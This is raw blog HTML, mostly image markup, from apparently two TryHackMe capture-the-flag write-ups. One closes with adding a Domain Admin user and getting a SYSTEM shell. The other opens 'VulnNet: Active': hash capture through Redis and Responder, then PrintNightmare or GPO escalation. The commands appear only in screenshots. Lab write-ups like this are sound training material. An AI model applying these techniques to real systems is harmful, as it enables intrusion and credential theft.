url('data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAACCAYAAABYBvyLAAAACXBIWXMAAAsTAAALEwEAmpwYAAAAfElEQVR42iWNUQ6CMBBEuQqYYKUVrJa2EAqIMUa9/3meW/x4mclMdrZw7k7wG8Et2H7FXGYh0V5XznbBCNnrnNvEyYw07UTTzWjpVJt2r0xEaU8R0wc/vRnmL7f4xAn98JLxB7pL++D/ST4aOdSe6hh2SiWqImXtBEvVBH5EnD/b7f0GhAAAAABJRU5ErkJggg=='); background-size: cover; display: block;" ></span> <img class="gatsby-resp-image-image" alt="dnscmd" title="" src="/static/43f73959a15d105fb03a251e21dd2c48/50637/dnscmd.png" srcset="/static/43f73959a15d105fb03a251e21dd2c48/dda05/dnscmd.png 158w, /static/43f73959a15d105fb03a251e21dd2c48/679a3/dnscmd.png 315w, /static/43f73959a15d105fb03a251e21dd2c48/50637/dnscmd.png 630w, /static/43f73959a15d105fb03a251e21dd2c48/3c0d4/dnscmd.png 806w" sizes="(max-width: 630px) 100vw, 630px" style="width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;" loading="lazy" decoding="async" /> </a> </span></p> <p>Then, I restarted the DNS service:</p> <p><span class="gatsby-resp-image-wrapper" style="position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 615px; " > <a class="gatsby-resp-image-link" href="/static/e85d7ce2528df6fe1931bd1ef936e412/daa8e/stop-dns.png" style="display: block" target="_blank" rel="noopener" > <span class="gatsby-resp-image-background-image" style="padding-bottom: 27.21518987341772%; position: relative; bottom: 0; left: 0; background-image: url('data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAAFCAYAAABFA8wzAAAACXBIWXMAAAsTAAALEwEAmpwYAAAA+klEQVR42mWQ3VKDMBCFeRagJYUUAiUB+f8pKuBUveqF7/8cx92oozNenNlkk/PtSZw4LKBIaaCRyRwqa6D0DHWZkHLNvxTFLaKkhVQ9EjpT+YQ4HZCahfo9PFHCO5VwMjNbYzveYKona/IDA48kouobMFpZSDbiQEb3aP6JoY4v2KxxKRYCj7TO8dM7yQpFteJxu2N7/cAwv+Ghe7HJQhrMQ6SilHqxg11R/AJN9Yyq28mwoaaqKEkQlijqFcP1Hee0h5C1TSiTzr6Eewzi72GwG/wBNsMN637HxGa6FJ1bStKj7ncyN/YOf4N71FYeV96zDto+2RclPgG016CGqIBarQAAAABJRU5ErkJggg=='); background-size: cover; display: block;" ></span> <img class="gatsby-resp-image-image" alt="stop dns" title="" src="/static/e85d7ce2528df6fe1931bd1ef936e412/daa8e/stop-dns.png" srcset="/static/e85d7ce2528df6fe1931bd1ef936e412/dda05/stop-dns.png 158w, /static/e85d7ce2528df6fe1931bd1ef936e412/679a3/stop-dns.png 315w, /static/e85d7ce2528df6fe1931bd1ef936e412/daa8e/stop-dns.png 615w" sizes="(max-width: 615px) 100vw, 615px" style="width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;" loading="lazy" decoding="async" /> </a> </span></p> <p><span class="gatsby-resp-image-wrapper" style="position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 630px; " > <a class="gatsby-resp-image-link" href="/static/f66b4dc7718f33fd75be760cc66182b8/87b66/start-dns.png" style="display: block" target="_blank" rel="noopener" > <span class="gatsby-resp-image-background-image" style="padding-bottom: 29.11392405063291%; position: relative; bottom: 0; left: 0; background-image: url('data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAAGCAYAAADDl76dAAAACXBIWXMAAAsTAAALEwEAmpwYAAABJUlEQVR42nWQ3VLCMBCFeRShP0kLCG2TlJba0gIWlBEcxwvf/0GOZ6PjeKEX3yTd3ZyePROzqGC0g1taFKZDbg/IigGZIW6PtemR3DeYr1ossx2K8ogV++uiR8bZlL1Al4iSCqHeYCIPH/oXuPoEldaYhgUx0PMaq3yHnKJ28whDRPCOfWEama8ztph94wVnYY6cLtZZh5BFlfJPykEvanTDDcfTO86XD/SHV+9eHJrNSPEOtjr91Fw9Ik4pGCqDujlj2N/QD1e0/ZXrDEiXDZr2grIaESjrh9W8gmY9IYobyJksth6ZjxIRjA2a7oLj+IaH7hkx84yYiaWLllGIWyHQspLz4oF8/0HId15w2zzBlgfIPaLjGfOR/AquI3cvqn9T/ssneFm/IYC27UwAAAAASUVORK5CYII='); background-size: cover; display: block;" ></span> <img class="gatsby-resp-image-image" alt="start dns" title="" src="/static/f66b4dc7718f33fd75be760cc66182b8/50637/start-dns.png" srcset="/static/f66b4dc7718f33fd75be760cc66182b8/dda05/start-dns.png 158w, /static/f66b4dc7718f33fd75be760cc66182b8/679a3/start-dns.png 315w, /static/f66b4dc7718f33fd75be760cc66182b8/50637/start-dns.png 630w, /static/f66b4dc7718f33fd75be760cc66182b8/87b66/start-dns.png 662w" sizes="(max-width: 630px) 100vw, 630px" style="width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;" loading="lazy" decoding="async" /> </a> </span></p> <p>The SMB server showed an incoming connection:</p> <p><span class="gatsby-resp-image-wrapper" style="position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 630px; " > <a class="gatsby-resp-image-link" href="/static/c7058d83d1ee17bc051e2e49e8f45cc4/f3121/smb-server-connection.png" style="display: block" target="_blank" rel="noopener" > <span class="gatsby-resp-image-background-image" style="padding-bottom: 34.810126582278485%; position: relative; bottom: 0; left: 0; background-image: url('data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAAHCAYAAAAIy204AAAACXBIWXMAAAsTAAALEwEAmpwYAAABaElEQVR42lWRaXLCMAyFc5N2oAMJlCWBBJIYspLFWdh32g69/x1eZcN02h/fPMkjPcm2YlgenHkGN6xh+6VEtxcYuylGTgKDYqEjO4E+iWGxDKabYDgJ0dUZmh0Tb13rF8WkRlcY+jmcoJIMrYgaIujTBfpmQIQwnrE0n8YYjH10hi6aGhl1nghDa8YRZDt4cQ03KBHle7wbc/SoofvUju6hoU1oGwsvrRFe22M01AdNzfyHYrJcGsbFUWq2vMBPNkjrszSP+F7mXrKWz6EOGFo9B+2+Q2pD7dvQBq7cVqUzxfE4ZtFSNoT5DkG6BfuTC+aLNRkfaOAWIQ0VA+KC8nRDQ3dY0NB8ecYsrKCEyQq8ogMiK4/g6xsKYrm/I6svVHhFvrqCbz6kVrsvFBSXkk+sDnfSGzanb8RkrsT8hJqKyhU1lwdwUkY/ziJ6U5oothVXnc45bK+Qt3l8XikRdYzqfFpsMsvwA5Pt9Yjx1b4QAAAAAElFTkSuQmCC'); background-size: cover; display: block;" ></span> <img class="gatsby-resp-image-image" alt="smb server connection" title="" src="/static/c7058d83d1ee17bc051e2e49e8f45cc4/50637/smb-server-connection.png" srcset="/static/c7058d83d1ee17bc051e2e49e8f45cc4/dda05/smb-server-connection.png 158w, /static/c7058d83d1ee17bc051e2e49e8f45cc4/679a3/smb-server-connection.png 315w, /static/c7058d83d1ee17bc051e2e49e8f45cc4/50637/smb-server-connection.png 630w, /static/c7058d83d1ee17bc051e2e49e8f45cc4/f3121/smb-server-connection.png 735w" sizes="(max-width: 630px) 100vw, 630px" style="width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;" loading="lazy" decoding="async" /> </a> </span></p> <p>Once the service restarted, a new user (<code class="language-text">mike</code>) was added to the system as a Domain Admin:</p> <p><span class="gatsby-resp-image-wrapper" style="position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 547px; " > <a class="gatsby-resp-image-link" href="/static/04ec845cccc4fb7903215049d8e58b38/00787/net-user-mike.png" style="display: block" target="_blank" rel="noopener" > <span class="gatsby-resp-image-background-image" style="padding-bottom: 77.84810126582278%; position: relative; bottom: 0; left: 0; background-image: url('data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAAQCAYAAAAWGF8bAAAACXBIWXMAAAsTAAALEwEAmpwYAAACdUlEQVR42n1Ua1faUBDkl7QVk4CBhLzf5EECWBER9fRLT///z5jOLupBS/2w5yY3dye7M7N3lLgFikWJzE6R+xH8sEacbxGmA+Jsg6Z/RNU8IOKzF680An6Tdz/pMZ6EuGYY04SRYbTs9ug2zzBnOb4ZEa6tGGOL6yRmJJgtakzsHFdmxORYQ/Yl5PkElCqYAm7vfiFf3qGq7+HHHZMzmHb6ftAi2GRWYDovMXVkLfTdvMlegdKPgMVyh7S8RdsfdQ3Y0g2TpAJJyvk9TNakYI0gGd5XAZUz/wAu270CSaJUeqosea9Q9hdh+4GGj0CfACMSLOR6YQcv6sjZUhPfQBdBR3HWpKNXPuXdj1aw3eXlCvvtMypWWTb3aIcj1Vsr4JjimEwomz3q7kFbnXkNf7rSsJ3qQqUEvD/8xooqD9sX7I9/0A2PcP0GNkUwmCA/E7Ecv9aq5gR1/FZFugg492ptc+4tVRCXiWE8wGWiwUoXQUtxUtomPFnFOlV/mccUo3r1gKz6SfPu4JCjpLiFQ7ArI4TJA8KZZWdnfvs6RuvtE9rVAZvbFwJW2qYAySohRpc4V/5LwCzfIKdtEooxc0qMjVNrb4Au+RJaPtvpv4ARLSNgPr02dysEVFBGTaqSShPO7Iz7AqSVn4G+Tcv51Iw8iuBSEAWjFwXYZqWGlah9TIJ/vw51ln9QmKszj+p8v4o0VloI2PByqOod2u6Anj4cNk/o10ckvHEsHjq6JZ6CBrt5juegRjs9XRATXiZyGy3YkR/1tFKjVI2yYkvj7lGQRwXuD8ppyv2IZh44ejWfPc53SHs5tJBWzlVAbHYmE3TzavS/kvX9MPSArR4AAAAASUVORK5CYII='); background-size: cover; display: block;" ></span> <img class="gatsby-resp-image-image" alt="net user mike" title="" src="/static/04ec845cccc4fb7903215049d8e58b38/00787/net-user-mike.png" srcset="/static/04ec845cccc4fb7903215049d8e58b38/dda05/net-user-mike.png 158w, /static/04ec845cccc4fb7903215049d8e58b38/679a3/net-user-mike.png 315w, /static/04ec845cccc4fb7903215049d8e58b38/00787/net-user-mike.png 547w" sizes="(max-width: 547px) 100vw, 547px" style="width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;" loading="lazy" decoding="async" /> </a> </span></p> <p>With administrative access, I was able to use <code class="language-text">psexec.py</code> to get a shell as <code class="language-text">nt authority\system</code>:</p> <p><span class="gatsby-resp-image-wrapper" style="position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 630px; " > <a class="gatsby-resp-image-link" href="/static/e39de635195789665cb864d78ee70aa9/0df09/system-shell.png" style="display: block" target="_blank" rel="noopener" > <span class="gatsby-resp-image-background-image" style="padding-bottom: 72.78481012658227%; position: relative; bottom: 0; left: 0; background-image: url('data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAAPCAYAAADkmO9VAAAACXBIWXMAAAsTAAALEwEAmpwYAAAB+UlEQVR42o2T63KiQBCFeZNs4mqCioDAyGUYBBQlimZ182ff/z3OdrdJ6aaKrD9ODbf55nSfxhqqDsP4hOdoi6Tco969o2p/o27P0PUe7qLCcLq4Sz8nCpafd3CSFrO4Qbrcw6zfkFUdlGmh9AbeoiaVGPsaflzJtatKzMJC7mdRAY/uPTp47GewzOqIMFnBCZb0kjZ6Obmq6eMak8DQRzmdHsvpI+cOh0VzQrU9k7MTivUvcbg5/IFZveHZzWB7mj5k4GXD/2Rl5UE26/ooyqiPcbGjso9YUNlhthH3o2lyL7CDFuAByZJBB6j8lUpeIzavmPgGT7YSDew7gEo34iglMLtJKBgO5/psi+mcA1jhxdUX6PgbYEhJBWqJMG0EOE/W1Lccjy+RaCD9izH8WAdj6qVIXXULZCcBjQKDVd4KzCYnvHK5nPqY1sncUJIJngg2+Aq8kRWRq0hvEdCY+DQuQboRMGsWlgQqRFMOxkkvvRRoD7BoztSvvaTKwSiCczCaNHISPIwC/Pgo/wpb9EItNzTUdCMuZqqWHvJQezLca7l3wuUXUD/UUukKfpjDI/EfY3tG5o/7KGFQ3z439gFvoVa5fUdidmCwqTsKQtO/WkmSHIBH48Ij82//vgEObHpoX16qrEFEJfJml8snEM8li//zq9t+4F8wYOF7038kTgAAAABJRU5ErkJggg=='); background-size: cover; display: block;" ></span> <img class="gatsby-resp-image-image" alt="system shell" title="" src="/static/e39de635195789665cb864d78ee70aa9/50637/system-shell.png" srcset="/static/e39de635195789665cb864d78ee70aa9/dda05/system-shell.png 158w, /static/e39de635195789665cb864d78ee70aa9/679a3/system-shell.png 315w, /static/e39de635195789665cb864d78ee70aa9/50637/system-shell.png 630w, /static/e39de635195789665cb864d78ee70aa9/0df09/system-shell.png 707w" sizes="(max-width: 630px) 100vw, 630px" style="width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;" loading="lazy" decoding="async" /> </a> </span></p>https://mgarrity.com/tryhackme-vulnnet-active/https://mgarrity.com/tryhackme-vulnnet-active/Sun, 03 Dec 2023 00:00:00 GMT<p><span class="gatsby-resp-image-wrapper" style="position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 630px; " > <a class="gatsby-resp-image-link" href="/static/1a3ef6b93173dae6a8b7a7b3e74e52bf/3b67f/vulnnet-active.png" style="display: block" target="_blank" rel="noopener" > <span class="gatsby-resp-image-background-image" style="padding-bottom: 43.67088607594937%; position: relative; bottom: 0; left: 0; background-image: url('data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAAJCAYAAAAywQxIAAAACXBIWXMAAAsTAAALEwEAmpwYAAAA+0lEQVR42mMQFFf7jwsLS2r8F5HSBNLq/wXEVP/zCiuBaXx6GHBJgDSycEn9Z2QX/8/OKwsWk1E0AFtCsoEgw0Sltf5n5JT+b2zp+T952tz/Z89d/H/2/KX/GrrW/3mEFP8LSagTZyBIIQ/Qa0rqpv+/ffv+/8PHT/9v37n/HwRevnz9X0OPDAN5hZX/y6kY/T9+4sz/Q4eP/9+4ecf/Gzdu/99/4Mh/FS0LcFgOnAvhYQiM3fjkvP9VtW3/J06Z/f/chcv/T50+/19dxwpooBJpBsIMZeaS/M/KLfWfjUfmPwe/7H8pBT1wMsKXdBjwJQFRaU04JmQQzEAAeood4Hh705IAAAAASUVORK5CYII='); background-size: cover; display: block;" ></span> <img class="gatsby-resp-image-image" alt="VulnNet: Active" title="" src="/static/1a3ef6b93173dae6a8b7a7b3e74e52bf/50637/vulnnet-active.png" srcset="/static/1a3ef6b93173dae6a8b7a7b3e74e52bf/dda05/vulnnet-active.png 158w, /static/1a3ef6b93173dae6a8b7a7b3e74e52bf/679a3/vulnnet-active.png 315w, /static/1a3ef6b93173dae6a8b7a7b3e74e52bf/50637/vulnnet-active.png 630w, /static/1a3ef6b93173dae6a8b7a7b3e74e52bf/fddb0/vulnnet-active.png 945w, /static/1a3ef6b93173dae6a8b7a7b3e74e52bf/3b67f/vulnnet-active.png 1232w" sizes="(max-width: 630px) 100vw, 630px" style="width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;" loading="lazy" decoding="async" /> </a> </span></p> <p>VulnNet: Active is a Windows machine running Active Directory with an instance of Redis that doesn't require authentication. This can be leveraged to run a command that attempts to authenticate to a Responder SMB server, resulting in the interception of an NTLMv2 hash of a user. After cracking the hash, the credentials can be used to authenticate to an SMB share that contains a PowerShell script which can be overwritten with a reverse shell script. Once on the system, enumeration can reveal two different paths to privilege escalation: one is by running a PrintNightmare exploit, and the other is by exploiting a Group Policy Object misconfiguration; both methods result in a system shell.</p> <p><code class="language-text">nmap</code> scan:</p> <p><span class="gatsby-resp-image-wrapper" style="position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 557px; " > <a class="gatsby-resp-image-link" href="/static/cc743c8aa20972ab9f76a455904e24f5/fdbc5/nmap-scan.png" style="display: block" target="_blank" rel="noopener" > <span class="gatsby-resp-image-background-image" style="padding-bottom: 46.202531645569614%; position: relative; bottom: 0; left: 0; background-image: url('data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAAJCAYAAAAywQxIAAAACXBIWXMAAAsTAAALEwEAmpwYAAABqUlEQVR42m2R2ZKbMBBF/Scpm2XAMbtAYt8MNuOxSUKcSary/79x05KZOA95uKXuhj591doYbg6DzdCTO/R4gckGJNUbmvGOcljQXX6iGhecb7+RVheU7QQ/rmG7KWwvh+VmsP0C+6CE6WTY8PqG7PiOrF9Uo+i+QNaS8o2A35CRqvMd4+UXsm5WtdPrd6TFCFEMyKsReTmCJQ0MO8KmJkBBk9NiQtVcUbUzRDahqGfkBPainhz1cKIOQTJQfIRH0m2O3UsCTZ5WjK0ZYqt72GR0vYQAEadJ9XXVDWUzw2c9XHbEIWhwCFulgA8E7AmYQrO4Aip9FtD24gHMygsOfo26/0rwM8bpXeWfdLY2CiUV2+IhVfsHKLXnEnglwA/wfEJLj8DzV5zoISSYkWuDILqEWeIv+Cm+DnhCFbCjRcvmormBpSfKF+U2YB3MvQRyBTTsh8vngP8APVp2RHsJaNES6tC+pDsJ2hoMOzOGJpdvkcxExXKA9sJVvLPWbx/ASAwIkyNpwMEr4UYtmBgR0gAnqNXpk1Pvo07/umFD7ntVi7MTHMp3K/QPKAEnU2kX1fAAAAAASUVORK5CYII='); background-size: cover; display: block;" ></span> <img class="gatsby-resp-image-image" alt="nmap scan" title="" src="/static/cc743c8aa20972ab9f76a455904e24f5/fdbc5/nmap-scan.png" srcset="/static/cc743c8aa20972ab9f76a455904e24f5/dda05/nmap-scan.png 158w, /static/cc743c8aa20972ab9f76a455904e24f5/679a3/nmap-scan.png 315w, /static/cc743c8aa20972ab9f76a455904e24f5/fdbc5/nmap-scan.png 557w" sizes="(max-width: 557px) 100vw, 557px" style="width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;" loading="lazy" decoding="async" /> </a> </span></p> <p>Open ports:</p> <ul> <li>53 (DNS)</li> <li>135 (MSRPC)</li> <li>139, 445 (SMB)</li> <li>464 (kpasswd)</li> <li>6379 (Redis)</li> </ul> <p>The Redis port seemed interesting, so I used <code class="language-text">redis-cli</code> to connect to it. The <code class="language-text">info</code> command outputted some information about the server without needing to authenticate:</p> <p><span class="gatsby-resp-image-wrapper" style="position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 408px; " > <a class="gatsby-resp-image-link" href="/static/8c65f3014f9b91dd91a1466fd629e50d/84f3a/redis-info.png" style="display: block" target="_blank" rel="noopener" > <span class="gatsby-resp-image-background-image" style="padding-bottom: 79.11392405063292%; position: relative; bottom: 0; left: 0; background-image: url('data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAAQCAYAAAAWGF8bAAAACXBIWXMAAAsTAAALEwEAmpwYAAAC2ElEQVR42oWU6XKjSBCE9SJri0NIQiBxg7hBgGwkWZc9O945dt//JXKTlnY2HOGI+ZHR0EF/kVVZzWhip9D8Dmr8A8r6nfoGJThDczOkmxMOr39j+/KO5+M3nN7+QX/+ju7wjsP1J5L6hc9fUW3P0P0K8izASI866PEJRvmKRXrCMr/CWPdYJS3y5iQOV9sr8vYCL+4wtzIsnBymV96fCyzsHBNzDUUPMQrzHkV7Qv38ijB7gpd08JMtnLCBwY/tqIGyCCHN/A8aTz++DzABdNZbAs+Iyh389AmmX8NwS6EVoR7h6iL6deB3osM9GrrLNgek1V7Ai/aIpn9Df/wLu8t3WEGFR82FNA8gz38HzHo0Txfk9QEZlRQ7ZGWPhLIYjGklVIwFZVAzk26HEhcDIPoMuCPwFUl1RNVdkTGIvLnQ4Z+ouV90F4QJe7vuEMQNTDuBpC4haxbkqQOFrj8AXX4oDrZXbPdfsPIqOkl5MOWaQNN9PEgmHuQl/pBNjFWCNAfyxBJgSV0R9D90FGXPt3KrA3KWGdLFZOpCoQbYlKXNjAhzjoW+TMS+kGYL6CCVwP+CGw09KzjAJecsLfdcr6iHMhmWywkI0h52sBElOwznYXCpLDG+r4+ygfHEFoEJYJzTWX1EPkDZv3b3FfvzD/b0ADesYfslgqiCF1ZYsQ1OMOzV8HghLG/Dee3gBiWWHHSVIY0GF3GxF8CkHEboDX5UQ2eatleIw3bQsLcNLJ8KWrEuCTOcChaBYgoMJj9Z0SFhbf8Fmy1vStxyZHYoN0eW/4Ig6QXoUfUgTQOMNf8mPkt3PbLsB0lnWEuRugBW3Rkxr+CKtyMkJBSgDdT5+iZ9fZ85an5fhz2GI6sm9/xbKNQoSJ6RMhh//cRBrtmPlr3r2KMttEXMP0h4g3wiSTHpyv0w4COPoLzmz4FDXdRnJPkLVk5NtzUmg4vZ5zBlKPnu7pd7PcS/KOAK7urw4KEAAAAASUVORK5CYII='); background-size: cover; display: block;" ></span> <img class="gatsby-resp-image-image" alt="redis info" title="" src="/static/8c65f3014f9b91dd91a1466fd629e50d/84f3a/redis-info.png" srcset="/static/8c65f3014f9b91dd91a1466fd629e50d/dda05/redis-info.png 158w, /static/8c65f3014f9b91dd91a1466fd629e50d/679a3/redis-info.png 315w, /static/8c65f3014f9b91dd91a1466fd629e50d/84f3a/redis-info.png 408w" sizes="(max-width: 408px) 100vw, 408px" style="width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;" loading="lazy" decoding="async" /> </a> </span></p> <p>I listed configuration data:</p> <p><span class="gatsby-resp-image-wrapper" style="position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 268px; " > <a class="gatsby-resp-image-link" href="/static/237a4373c83b8aed832b18a301493092/471d4/redis-config-get-all.png" style="display: block" target="_blank" rel="noopener" > <span class="gatsby-resp-image-background-image" style="padding-bottom: 53.79746835443038%; position: relative; bottom: 0; left: 0; background-image: url('data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAALCAYAAAB/Ca1DAAAACXBIWXMAAAsTAAALEwEAmpwYAAAB/0lEQVR42m1S2XaiQBTkSyYCiiirIIhhVWRxiRo1zpLH/P831FQzGpNz5qFOnab71q26F8mPN1itTwizHcr2hKQ8IIhblJsrnostsuq1Q5i0CNINjtcPNC8/sWgvmPO+ObzDj0pMohWUUQhJs54xjRtEvBRc7/+gXL9ReI+8FmJHVLtfbNJAs2KYfgHdTTCeZNCdGIaXo29EGJhzqOMZpN5wCoOPwrTF2MuwXF+xbM+do6w+Y/v6jmx16IpkPeggnMh6eGOeKaTeIIkP7rxmvB2ccIm4PKLd/0a8eKHrfedWY3fhSncSijyK/wdJFg5pexZXML0UKaNWmwuKcttFrrdvnPEF2XKLgcEiunoIRFDpvOOHoA97ukDEiDYFdSvCk+pCHrhkBz3VJls8O1AG9hfwrLlQhh5U3f9sRMEAdlBinm1g+QsUzZkzvCBdcinVCQU3vKhP8GbcIsejCtCEEFLYVAjLfZuwukaSok3hzioknKE9XSLKtoxeYOym5JxNChhuhr6IJeZ3x7cz3elTOvYoyBk6wQpxvmNhCmNSwKZTg6IWGzgBQTb5m6h3hyxWh1+g3xFAUhlZOBI/s5hlwXhJscFzvmbsHbKCnDfQxz56IhbjKZ/8gIgsIPU0H5NZiSRvMTJDaCMfP2QTT4r9D1yMWJLCd6J5h85l+B23u78n4mIbGBIkmQAAAABJRU5ErkJggg=='); background-size: cover; display: block;" ></span> <img class="gatsby-resp-image-image" alt="config GET *" title="" src="/static/237a4373c83b8aed832b18a301493092/471d4/redis-config-get-all.png" srcset="/static/237a4373c83b8aed832b18a301493092/dda05/redis-config-get-all.png 158w, /static/237a4373c83b8aed832b18a301493092/471d4/redis-config-get-all.png 268w" sizes="(max-width: 268px) 100vw, 268px" style="width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;" loading="lazy" decoding="async" /> </a> </span></p> <p>This showed that the instance was running in the context of the <code class="language-text">enterprise-security</code> user:</p> <p><span class="gatsby-resp-image-wrapper" style="position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 610px; " > <a class="gatsby-resp-image-link" href="/static/7db29cda131bd1b5aa90a2d0ab3dab67/574c5/redis-enterprise-security-user.png" style="display: block" target="_blank" rel="noopener" > <span class="gatsby-resp-image-background-image" style="padding-bottom: 67.08860759493672%; position: relative; bottom: 0; left: 0; background-image: url('data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAANCAYAAACpUE5eAAAACXBIWXMAAAsTAAALEwEAmpwYAAACI0lEQVR42n1T2ZKbMBDkRzY+OAzYIMAgbjC+vc6uk0r+/1c6LYF3q7a28tDVowG1emYkox3eUfdvaHfvyIoLovSATTzAFx1Mr4BFmG6OpR3B8iWRa5gTq5zpRFg6QueMuntD3v2ErG/wRA97XePFzjCjyIJic6/EfMW1LTDnhrmXj/wFi1WCpZvAaOjuXhzxkHvckh7XuMM9O+BCPooa57jFSTQ4hxLXpMV122ucohqHsNR8Yz5yUyyUQ1VqV11x3T9wYfkKtTxBrCsEfoFwXY7ghnAVMc74TeVzDbEpiQIrT44lK4eyuaM7/kbFONwe8GKl+GFLzF1V8gTGM2eLmSV0+boFE89UD71sFGyHB4rmFf3+F4dyRhDvECYDecBqU+uBWH75CT0o5uhIg85NJ+bQBJbso1FxIHn9iv35L2rGa07XD4mgpVjJZrPhDt06GWPFkmsVT3ClHtrcirGwYxhle9eCh/MfqPKVaMXJl2xDs3tAHRjQcZLT/XaPMN1rDpIdRDpyUp4RyQNc9pIO7ygoWmunN82JPPJjhQ2vkXZLqBZ4KlY5VuGJFn7Ua95sB97dni0qYRQUycorkuyIgD+YK9WXXEPFTyydT+i1gjviWbqK9cXOygti3r2IJaQcjHotsTqApz7FbQ7Dnl6O5T4Hw1ekmNfL9MfYqFhuVlGQIh+bJoGn2LfwRphfYBTNDbIaHQr2QrmVvOgLO/2/qPc9/gExgJyx5e2aIgAAAABJRU5ErkJggg=='); background-size: cover; display: block;" ></span> <img class="gatsby-resp-image-image" alt="redis enterprise-security user" title="" src="/static/7db29cda131bd1b5aa90a2d0ab3dab67/574c5/redis-enterprise-security-user.png" srcset="/static/7db29cda131bd1b5aa90a2d0ab3dab67/dda05/redis-enterprise-security-user.png 158w, /static/7db29cda131bd1b5aa90a2d0ab3dab67/679a3/redis-enterprise-security-user.png 315w, /static/7db29cda131bd1b5aa90a2d0ab3dab67/574c5/redis-enterprise-security-user.png 610w" sizes="(max-width: 610px) 100vw, 610px" style="width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;" loading="lazy" decoding="async" /> </a> </span></p> <p>Redis supports scripting with Lua. In this case, it could be leveraged to attempt an authentication to an SMB server and reveal a password hash.</p> <p>I started the SMB server with <code class="language-text">responder</code>:</p> <p><span class="gatsby-resp-image-wrapper" style="position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 472px; " > <a class="gatsby-resp-image-link" href="/static/fc04bb48e9cf7967dd857a21efbab964/1b0b6/responder.png" style="display: block" target="_blank" rel="noopener" > <span class="gatsby-resp-image-background-image" style="padding-bottom: 146.8354430379747%; position: relative; bottom: 0; left: 0; background-image: url('data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAAdCAYAAACqhkzFAAAACXBIWXMAAAsTAAALEwEAmpwYAAAEPElEQVR42pVV2XLjRgz0j6Sig6REUqR4nzqowzos+S5bm8S7m6rk/3+h04AU26nalZ0H1AyHMz0NoIG5sOIZeqNH2M0zrPoAa3xAv9oin99gsXvC7uEPNOt7TFd3GC+vaTfIxxvU8z3CaoGuk8Jws1e7CMo18sU9kmaDdLpHsbxHONnDK5ZIJxsk1QodO0GrF6Hdj0+W6FqHowD+awpouDmcYAx7OMYgmnKsYQe0cAw3mqAfjOCEE875HcvaiOME3mnuhLK/4jg6ApqDkocncKIGtl8jyJfwkoY2Q5/gCkgwOSAXuTpWHGsMs0YBB7xArOeXwrDgjVMFdWl+tsSAYMNsjh5ZO2Tt8tuJeQnXfJrs95KjCdsgn+tlyrDr5BDr0Cyy9YMcg2GBPm9LUrrHuRcU8MNC5+6Q//lt+wV6gwzOUM7lb0lRMDtj0FNYToJ5HmGURAiHCVZliDJOMM1iLMsY4yzBsorQ5DGiKEUap8jiGMa7TF9YXgU/nSGp17SNuhsUl+paXG/5PSf7Ar/2eSlNPGm7R486DJfkwBoUb4A9JmJ5dcBqfyDgCtl4i/X1AVVzzbVnXR8vbjHfPFKDt9z7hPn2kRp9xoJjMd0hHa3eACUpUXmpWRX3bUooOAVeEhMWkqSG84UqICT7uFwhrtbqmcjOdAsdXxlWs2s12Sxs0tEGZbNDxWqRy2r+K5u9gkcEk/+jxY0Cyn8ZJQ8CemFw4lBrItwe4ykxFKkIGxG6G02VvWjTYKzkYMc+JvKokOx1btAuOl5CyglsL4dLLfX9Sje0++npMOen767YSWY/swtDBJrPsL56QFEv4Hq8zeZBxuV1IwFNemGv9jC8Ur9/CtgyY6SUx/7xKyIq/pe2i47h89Dbpg41amYz+H/9DYOl1+2fA6Qb2eRK5WEoK7ppDmmBzhWQe0x6Ev72Qqb1u/j9ALBtxSqJarY/xk1+iHCtiMxi3dSmubQNwzFkONrnYmgyfg7diSgJAZbUawKc4r+bhZWVaCbPJqXDFhWNtloB9fyW1XD3qqvXjbzAkI705QVdunw+KV0fYdpgub1HTsE2l3daIZ13SRHZOLx4Md/AUy2eYdgyhoiZ3YZvRFktMWnWaDHLLTN8A6T5jN2B6ynj2jqJ+MdJoSTC/JIMn9Xlkg9QwPbusN+1reCoScrEpBeDb3/CCD6QjQBGxQpTxk4Aa3YZn2Vms3l25THqHbNtcs1/+U7A+mPAILvEbPXIBnCNCYFNt6TLAhSedBkoQ//rZwCtlO1ow972jGKy4/v7gCHZdKSZkp26rAxZop8BbJmJdurZmgz5Lk8vH/hYjRVQmwHf4e6pUrzPMpQet9w+KWBD16WNSSi0nuUxl1pO/ofLkhRhWM9utPUHrBgBVZbqcqox9F6+fQwonSSibFa7LxjNj4Al3wlrUPHgaaMAylv8+8sR8Eyl/ANNspyt2paErwAAAABJRU5ErkJggg=='); background-size: cover; display: block;" ></span> <img class="gatsby-resp-image-image" alt="responder" title="" 